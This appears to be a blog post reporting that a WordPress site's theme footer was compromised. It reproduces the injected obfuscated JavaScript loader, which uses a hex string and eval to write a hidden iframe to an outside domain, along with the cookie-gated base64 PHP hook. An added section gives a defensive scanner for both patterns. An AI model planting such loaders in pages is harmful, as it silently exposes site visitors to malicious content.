yahg vulnerability again
The yahg bug referred to here just happened in my WordPress system running 2.5.1, in a different form. This previously happened on the previous 2.3.x system back in March, exactly like the description in the link above.
The server is running FC6 Fedora with Apache and very limited server access. It modified the active theme’s footer.php.
The generated output was:
</div> <!-- .content --> <script>function EE28C5BB86B6E59028669F5CDC87F6F8(CF2908786055451B){return(parseInt( CF2908786055451B,16));}function E417D2B635CB5916ED753C59F6166C( DCCEDD4FB8B32634B73){function DE1B365014D0708B785C319(){var EE79D2C759494C6B00D1F4FDC747343=2;return EE79D2C759494C6B00D1F4FDC747343;}var E60247718C17F3D8F853817B5="";for(C9B1DAB222ED47955E124DB6F83A9=0; C9B1DAB222ED47955E124DB6F83A9<DCCEDD4FB8B32634B73.length; C9B1DAB222ED47955E124DB6F83A9+=DE1B365014D0708B785C319()){ E60247718C17F3D8F853817B5+=( String.fromCharCode( EE28C5BB86B6E59028669F5CDC87F6F8(DCCEDD4FB8B32634B73.substr( C9B1DAB222ED47955E124DB6F83A9,DE1B365014D0708B785C319()))));}eval( E60247718C17F3D8F853817B5);}E417D2B635CB5916ED753C59F6166C(" 646F63756D656E742E777269746528223C696672616D65207372633D687474703A2F2F6773746174732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E22293B ");</script> <div class ="clear"></div> </div> <!-- Close Page -->
It attached itself to the top of the K2 theme footer.php.
<?php if (!isset($_COOKIE["yahg"])) echo base64_decode('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'); /* K2 Hook */ do_action('template_after_content'); ?> <div class="clear"></div> </div> <!-- Close Page -->
I have no idea how it modified the file. The date/time were the same as the offsite copy. Nothing else in the system was affected, so I’d guess that it was a WordPress vulnerability. Just bringing it to your attention.
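A static check for the two patterns shown in this post, added here as an example and not part of the original post or of WordPress: it flags a cookie-gated `echo base64_decode(` in a PHP template and decodes the hex string of an eval-based script loader as data, without executing it. The function names, the sample input and the placeholder domain `example.invalid` are constructed for illustration.

```javascript
// Added example: static triage of a theme file for the pattern in this post.
// Nothing from the file is executed; hex strings are decoded as data only.

// Same transformation the injected loader applies (parseInt(x, 16) plus
// String.fromCharCode over two-character chunks), without the eval().
function decodeHexPairs(hex) {
  const clean = hex.replace(/\s+/g, "");
  if (clean.length % 2 !== 0 || !/^[0-9a-fA-F]+$/.test(clean)) return null;
  let out = "";
  for (let i = 0; i < clean.length; i += 2) {
    out += String.fromCharCode(parseInt(clean.slice(i, i + 2), 16));
  }
  return out;
}

function scanThemeFile(source) {
  const findings = [];
  // PHP side: echo base64_decode(...) behind a $_COOKIE check, as in footer.php.
  if (/\$_COOKIE[^;{]*echo\s+base64_decode\s*\(/i.test(source)) {
    findings.push({ type: "php-cookie-gated-base64-echo" });
  }
  // Output side: <script> using eval + fromCharCode with a long hex literal.
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  const literalRe = /["']\s*((?:[0-9a-fA-F]{2}\s*){16,})["']/g;
  for (const [, body] of source.matchAll(scriptRe)) {
    if (!/\beval\s*\(/.test(body) || !body.includes("fromCharCode")) continue;
    for (const [, hex] of body.matchAll(literalRe)) {
      const decoded = decodeHexPairs(hex);
      if (decoded === null) continue;
      const hiddenIframe = /<iframe\b[^>]*display\s*:\s*none/i.test(decoded);
      findings.push({ type: "js-hex-eval-loader", decoded, hiddenIframe });
    }
  }
  return findings;
}

// Constructed sample in the shape of the post: placeholder base64 argument,
// placeholder domain, shortened function names.
const toHex = (s) =>
  [...s].map((c) => c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
const SAMPLE_PAYLOAD =
  'document.write("<iframe src=http://example.invalid style=display:none></iframe>");';
const SAMPLE = `<?php if (!isset($_COOKIE["yahg"])) echo base64_decode('PLACEHOLDER'); ?>
<script>function a(h){return parseInt(h,16);}function b(s){var o="";for(var i=0;i<s.length;i+=2){o+=String.fromCharCode(a(s.substr(i,2)));}eval(o);}b(" ${toHex(SAMPLE_PAYLOAD)} ");</script>`;

console.log(JSON.stringify(scanThemeFile(SAMPLE), null, 2));
```

Run it over the raw template source and over the rendered page output separately: the PHP pattern only appears in the file on disk, and the script loader only in what the server sends to a visitor without the cookie.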